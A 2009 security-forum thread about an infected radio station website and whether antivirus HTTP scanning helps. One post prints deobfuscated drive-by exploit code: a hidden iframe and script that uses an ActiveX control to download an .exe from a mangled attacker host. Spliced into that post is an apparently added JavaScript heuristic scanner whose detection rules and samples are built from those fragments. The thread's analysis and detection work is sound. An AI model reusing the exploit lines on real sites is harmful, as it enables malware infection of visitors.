This is the first time I visited an infected website!

Discussion in 'other anti-virus software' started by Football, Apr 27, 2009.

Thread Status:
Not open for further replies.
  1. Football

    Football Registered Member

    Joined:
    Nov 29, 2008
    Posts:
    96
    Location:
    Greece
    Today I visited the website of a radio station. Immediately Kaspersky Internet Security alerted me that "virus HEUR: Trojan.Script.Heuristic" was detected. At first I thought that this was a false positive and I sent a request to Kaspersky Lab. They replied to me in about an hour and informed me that this was not a false positive and that its detection will be added in the next update. So, excellent job by Kaspersky heuristics and by Kaspersky Lab for its prompt reaction.
    What is more, I learned something very important.
    I had never before visited an infected website which automatically downloads malware (at least my previous antivirus, ESET Smart Security, had not detected anything :rolleyes: ) and I thought that somebody would be infected via the internet only when they download files from unknown websites. (I had downloaded malware in this way two times in the past.) I was wrong!
    I do not know if the radio station infected its website itself or somebody else did it.
    What I know now is only this: A decent antivirus programme is indispensable nowadays.
     
  2. TrojanHunter

    TrojanHunter Registered Member

    Joined:
    Jul 8, 2007
    Posts:
    151
    Location:
    United Kingdom
    Yeah, quite surprising what you can find, even if you think the website is safe.
    A few weeks back I was surfing and a box appeared telling me that I had infections on my PC. I knew it was a rogue, but like an idiot I clicked Cancel, thinking the box would disappear (rogues don't understand Cancel :D ). I was redirected to a rogue anti-virus website, but I closed the browser before it could go any further and I was not infected.
     
  3. tipstir

    tipstir Registered Member

    Joined:
    Jun 9, 2008
    Posts:
    830
    Location:
    SFL, USA
    Yes, that is common, but in that event it is best to shut down the internet connection or simply unplug the LAN cable and reboot the PC. Otherwise these prompts on the network are smart enough to tell whether you press Yes or Cancel, since both are set to Yes no matter what you do.
     
  4. Zyrtec

    Zyrtec Registered Member

    Joined:
    Mar 4, 2008
    Posts:
    534
    Location:
    USA
    Well, I see how effective it is to have an antivirus installed with HTTP traffic scanning capabilities, because they scan for malicious scripts embedded in many web pages.

    So far, I know that ESET NOD32, Kaspersky, Avira and Avast! have this capability of scanning HTTP traffic before IE (or Firefox?) downloads the contents of the website to your PC.

    Although, I don't know whether Windows Vista IE "Protected Mode" could also be helpful regarding these kinds of threats.

    Best regards,

    Carlos
     
  5. lodore

    lodore Registered Member

    Joined:
    Jun 22, 2006
    Posts:
    9,006
    That would be the relatively new kjim script heuristics.
    The Kaspersky heuristics are getting better all the time.
    The heuristics detected an email attachment malware a while back.
    I thought it was malware anyway, since it was an email with an attachment from an unknown source, so I was going to delete the email anyway.
     
  6. Baz_kasp

    Baz_kasp Registered Member

    Joined:
    May 1, 2008
    Posts:
    593
    Location:
    London
    Can you give us a hint at the website (just don't make it an active link)? I would be interested to see what exactly it was trying to download :)
     
  7. Macstorm

    Macstorm Registered Member

    Joined:
    Mar 7, 2005
    Posts:
    2,531
    Location:
    Sneffels volcano
    And there are still people saying HTTP scanning is useless :rolleyes:
     
  8. tonyseeking

    tonyseeking Former Poster

    Joined:
    Nov 12, 2008
    Posts:
    406
    Solution... Firefox + NoScript add-on.
     
  9. tonyseeking

    tonyseeking Former Poster

    Joined:
    Nov 12, 2008
    Posts:
    406
    It is... it's a marketing scam.

    I can visit every website in the world and not get "infected" with anything.
     
  10. tonyseeking

    tonyseeking Former Poster

    Joined:
    Nov 12, 2008
    Posts:
    406
    This is exactly what Kaspersky was hoping for.. word of mouth advertisement.

    It's all a BIG SCAM.. to hook the ignorant to buy their products and to tell others how "good" their products are that it picked up this and that... blah blah blah.

    Marketing scam, deceptive, and down right ridiculous.

    Only the ignorant fall for it.
     
  11. firzen771

    firzen771 Registered Member

    Joined:
    Oct 29, 2007
    Posts:
    4,815
    Location:
    Canada
    That's a pretty bold statement... :cautious:
     
  12. Macstorm

    Macstorm Registered Member

    Joined:
    Mar 7, 2005
    Posts:
    2,531
    Location:
    Sneffels volcano
    do you? good luck then :-*
     
  13. tonyseeking

    tonyseeking Former Poster

    Joined:
    Nov 12, 2008
    Posts:
    406
    Bold, but true :)

    Come on guys and gals, don't be so gullible. This reminds me of the days when John McAfee was caught writing his own viruses so that people would think McAfee AV was the best one out there, catching the "new viruses" before any other AV :p

    Come on people... grow some brains, don't be fools.
     
  14. firzen771

    firzen771 Registered Member

    Joined:
    Oct 29, 2007
    Posts:
    4,815
    Location:
    Canada
    Hmm, well I'm glad you think that, good luck :rolleyes:
     
  15. tonyseeking

    tonyseeking Former Poster

    Joined:
    Nov 12, 2008
    Posts:
    406
    I will prove it and put my money where my mouth is... post the "infected" website and I will visit it.
     
  16. firzen771

    firzen771 Registered Member

    Joined:
    Oct 29, 2007
    Posts:
    4,815
    Location:
    Canada
    Yeah, I can throw on Sandboxie and know I'm 99.99% protected (because nothing is 100%), but when you're just surfing normally without a sandbox and might not be expecting an infected site, then boom; for all you know it could be a site you always go to that's been hijacked, and then it hits you...
     
  17. TonyW

    TonyW Registered Member

    Joined:
    Oct 12, 2005
    Posts:
    2,634
    Location:
    UK
    It's good to know KL picked this up, but I would suggest that if the site is still infected, some contact is made with the webmaster of it so it can be removed and cleaned up. It's one thing you being protected from it, but they still need to clean the malware off the site.

    This happened to a legitimate site I know of and the source code revealed javascript that shouldn't have been there. Yes, KL detected it by heuristics and later by signature detection, but contact was made with the site owners to alert them to the problem. In a relatively short while, they removed the malware, and KL no longer detected the threat on that site.
     
  18. DevilFrank

    DevilFrank Registered Member

    Joined:
    Jul 20, 2003
    Posts:
    108
    The protected mode of IE is a very strong solution to avoid these "drive-by downloads", because the rights needed to change the system are not provided. You have to accept any installation from the TIF via UAC.
     
  19. dawgg

    dawgg Registered Member

    Joined:
    Jun 18, 2006
    Posts:
    817
    Yes, one of the best protection methods against these, but usability to the "average user" is a big down-side (layouts of websites etc).

    Mate, we all have our own opinions and I respect that, but calling everyone who thinks something is useful "ignorant" and "fools" just because you do not agree... well, it's not exactly a clever thing to say. :thumbd:

    Please respect others and their opinions.
     
  20. Baz_kasp

    Baz_kasp Registered Member

    Joined:
    May 1, 2008
    Posts:
    593
    Location:
    London

    Hmm, yes they are lying to steal your money :cautious:

    Let me give you an example:

    Obfuscated script detected by heuristics.... blocked before it can do any damage.

    Unobfuscated form:

    Code:
    <iframe src="http://jL.-----.pl/rc/" style="display:none">
    Mangled the links to prevent infection.

    That leads to another script (also detected by heuristics) which you can see here:
    paste2.org/p/193626 (safe link, text dump only)

    After decrypting that one, looks more like this:
    paste2.org/p/193630 (safe link again)


    Most important parts:

    Code:
    .....
    if (!obj) {obj = new ActiveXObject("PDF.PdfCtrl");}
    if (obj) {document.getElementById("pdfplace").innerHTML = "<embed width='150' height='150' src='http://jl.----.pl/rc/pdf.php?id=460939' type='application/pdf'></embed>";}
    } catch(e) {
    document.getElementById("pdfplace").innerHTML = "<embed width='150' height='150' src='http://jl.----.pl/rc/pdf.php?id=460939' type='application/pdf'></embed>";
    
    ......
    function snpac(){
    var buf1 = 'http://jl.-----.pl/rc/load.php?id=460939&spl=4';
    try{
    var obj = document.createElement('object');
    obj.setAttribute('classid', 'clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9');
    obj.setAttribute("id", "obj");
    obj.SnapshotPath = buf1;
    obj.CompressedPath = 'C:\NOFCym2lizm5Rw35.exe';
    obj.PrintSnapshot();
    } catch(e) {}
    setTimeout("pdf()", 300);
    }
    
    attack(1);
    0
    Guess what this code does then.....


    2 nice files, 8796.pfd and load.exe


    It's all good walking around with a smug look on your face telling people they are idiots but the fact is would you rather be one of these ignorant people who use antivirus and trust heuristics or put yourself up against a fully fledged pdf exploit (15/40)+virut payload (21/40) that even sandboxie may not be able to save you from? ;)

    And please don't come back with something impractical like "use linux" or "use sandboxie and forget your AV" or "use an imaging program" because it may be good for you, but for most home users it's entirely impractical because they have no idea what a sandbox is, what kind of animal a linux is or what the difference between a disk imager and photoshop is.
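
The chain quoted in the post above (hidden iframe, obfuscated loader, decoded second stage that instantiates ActiveX controls and writes an .exe to C:\) is exactly what an HTTP-traffic scanner has to judge before the browser acts on the page. The following is an added example, not code from the thread and not any vendor's engine: a small static heuristic scanner that peels the common `unescape()` / `String.fromCharCode()` obfuscation layers and scores the result against a handful of rules derived from the posted fragments. Rule weights, the block threshold and the sample pages are assumptions made for this example; the samples are constructed from the fragments in the post, with the attacker hostname kept mangled as "jl.----.pl".

```javascript
// Added example: heuristic scanning of page content for drive-by indicators.
// Not the original post's code and not any antivirus vendor's engine.

// Each rule is a regex over page text plus a weight. A verdict comes from the
// summed weight of rules that fire on any decoded layer of the page.
const RULES = [
  // An iframe hidden with CSS, the injection technique shown in the post.
  { name: "hidden-iframe", weight: 3,
    re: /<iframe\b[^>]*style\s*=\s*["']?[^"'>]*display\s*:\s*none/i },
  // Script that writes or evaluates content from an encoded blob.
  { name: "decoder-stub", weight: 3,
    re: /(?:eval|document\.write)\s*\(\s*(?:unescape|String\.fromCharCode)\s*\(/i },
  // Generic ActiveX instantiation from script.
  { name: "activex-instantiation", weight: 2,
    re: /new\s+ActiveXObject\s*\(/i },
  // The Snapshot Viewer control CLSID used by the decoded payload in the post.
  { name: "snapshot-viewer-clsid", weight: 4,
    re: /clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9/i },
  // Script pointing a control's output at a local .exe path.
  { name: "exe-write-target", weight: 4,
    re: /CompressedPath\s*=\s*['"][A-Za-z]:\\[^'"]*\.exe['"]/i },
  // A PDF embed whose bytes come from a server-side script (pdf.php?id=...).
  { name: "script-generated-pdf", weight: 2,
    re: /<embed\b[^>]*src=['"][^'"]*\.php\?[^'"]*['"][^>]*type=['"]application\/pdf['"]/i },
];

// Decode one layer of the two obfuscation idioms handled here:
// unescape("%3C...") and String.fromCharCode(60, 105, ...).
// The decoded text is only scanned, never executed.
function decodeLayer(text) {
  let out = text.replace(/unescape\(\s*(["'])([^"']*)\1\s*\)/g, (_, q, s) =>
    q + s.replace(/%([0-9a-fA-F]{2})/g, (_m, h) => String.fromCharCode(parseInt(h, 16))) + q);
  out = out.replace(/String\.fromCharCode\(([\d\s,]+)\)/g, (_, list) =>
    '"' + list.split(",").map(n => String.fromCharCode(parseInt(n, 10))).join("") + '"');
  return out;
}

// Peel layers until the text stops changing (bounded), keeping every layer so
// that rules which only fire on the wrapper (decoder-stub) still count.
function unpackLayers(text, maxLayers = 5) {
  const layers = [text];
  for (let i = 0; i < maxLayers; i++) {
    const next = decodeLayer(layers[layers.length - 1]);
    if (next === layers[layers.length - 1]) break;
    layers.push(next);
  }
  return layers;
}

function scanPage(text) {
  const layers = unpackLayers(text);
  const fired = RULES.filter(r => layers.some(l => r.re.test(l)));
  const score = fired.reduce((s, r) => s + r.weight, 0);
  const verdict = score >= 5 ? "block" : score > 0 ? "suspicious" : "clean";
  return { layers: layers.length, hits: fired.map(r => r.name), score, verdict };
}

// Constructed sample pages (assumptions for this example, not captured data).
const SAMPLES = {
  // A normal page with a visible embedded player and an innocuous script.
  benign: '<p>Now playing</p><iframe src="https://example.com/player" width="300" height="80"></iframe>'
    + '<script>var box = document.getElementById("pdfplace");</script>',
  // The unobfuscated injected iframe from the post.
  injectedIframe: '<p>Now playing</p><iframe src="http://jl.----.pl/rc/" style="display:none"></iframe>',
  // The same iframe delivered through a percent-encoded document.write stub.
  obfuscatedStub: '<script>document.write(unescape("%3Ciframe%20src%3D%22http%3A//jl.----.pl/rc/%22'
    + '%20style%3D%22display%3Anone%22%3E%3C/iframe%3E"));</script>',
  // Lines modelled on the decoded second stage quoted in the post.
  payload: "try { var obj = new ActiveXObject('PDF.PdfCtrl'); } catch(e) {}\n"
    + "document.getElementById('pdfplace').innerHTML = \"<embed width='150' height='150' "
    + "src='http://jl.----.pl/rc/pdf.php?id=460939' type='application/pdf'></embed>\";\n"
    + "var o = document.createElement('object');\n"
    + "o.setAttribute('classid', 'clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9');\n"
    + "o.SnapshotPath = 'http://jl.----.pl/rc/load.php?id=460939&spl=4';\n"
    + "o.CompressedPath = 'C:\\NOFCym2lizm5Rw35.exe';\n"
    + "o.PrintSnapshot();",
};

for (const [name, page] of Object.entries(SAMPLES)) {
  const r = scanPage(page);
  console.log(`${name.padEnd(15)} ${r.verdict.padEnd(10)} score=${r.score} hits=${r.hits.join(",") || "-"}`);
}
```

The design point is that the scanner scores every decoded layer, not just the final one: the hidden iframe alone rates only "suspicious" here, but the same iframe wrapped in a `document.write(unescape(...))` stub crosses the block threshold because the decoder idiom itself is evidence. A real engine would also emulate `eval` chains and check the fetched PDF, which this example deliberately does not attempt.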
     
  21. Football

    Football Registered Member

    Joined:
    Nov 29, 2008
    Posts:
    96
    Location:
    Greece
    You may be an experienced user and maybe you will be able to avoid viruses without the help of an antivirus. But is every single user as experienced as you and knows how to prevent viruses alone? I think that the overall percentage of the people that can do this is about 5%. Does everyone know Sandboxie and NoScript? I learned about them only when I started visiting this forum six months ago. And in these six months I enhanced my knowledge of computer security a lot, and I can assure you that I am neither "ignorant" nor a "fool". But does anyone know of the existence of this forum to be informed?

    I am not an employee of Kaspersky and I do not try to make you buy this product by posting positive comments. I wanted simply to tell you that Kaspersky detected "Drive-By-Downloads" malware that maybe other antiviruses would also detect. ;)

    I thought that in this forum someone can also express their opinion about antiviruses. However, when I posted positive comments about Kaspersky, I became "ignorant", "fool" and somebody who spreads scams. Right?
     
    Last edited: Apr 28, 2009
  22. Joeythedude

    Joeythedude Registered Member

    Joined:
    Apr 19, 2007
    Posts:
    519
    I'm glad you did, and am always really glad to see posts with experience of real-world malware activity.

    I don't know anything about the usefulness or otherwise of HTTP scanning.

    However, I would be highly surprised, to say the least, if a large AV company had a routine policy of lying to customers about the usefulness of a specific aspect of their product, which is the logical conclusion of what the other poster is claiming.
     
    Last edited: Apr 28, 2009
  23. Bob D

    Bob D Registered Member

    Joined:
    Apr 18, 2005
    Posts:
    1,150
    Location:
    Mass., USA
    Pardon my naiveté, but are you saying the download started automatically?
    Versus prompted for a DL, or redirected to a DL site?
    Which browser are you using?

    Cheers
     
  24. tonyseeking

    tonyseeking Former Poster

    Joined:
    Nov 12, 2008
    Posts:
    406
    I can visit any "infected" website just using firefox and Vista, no sandboxie and still nothing will infect my Vista.
     
  25. tonyseeking

    tonyseeking Former Poster

    Joined:
    Nov 12, 2008
    Posts:
    406
    You have raised some intelligent, valid and fair comments. Point taken. :thumb:

    But I still fail to see how a website can automatically begin to download something without user knowledge, and then install itself on their windows without user approval. Can you show me a website that can do that?
     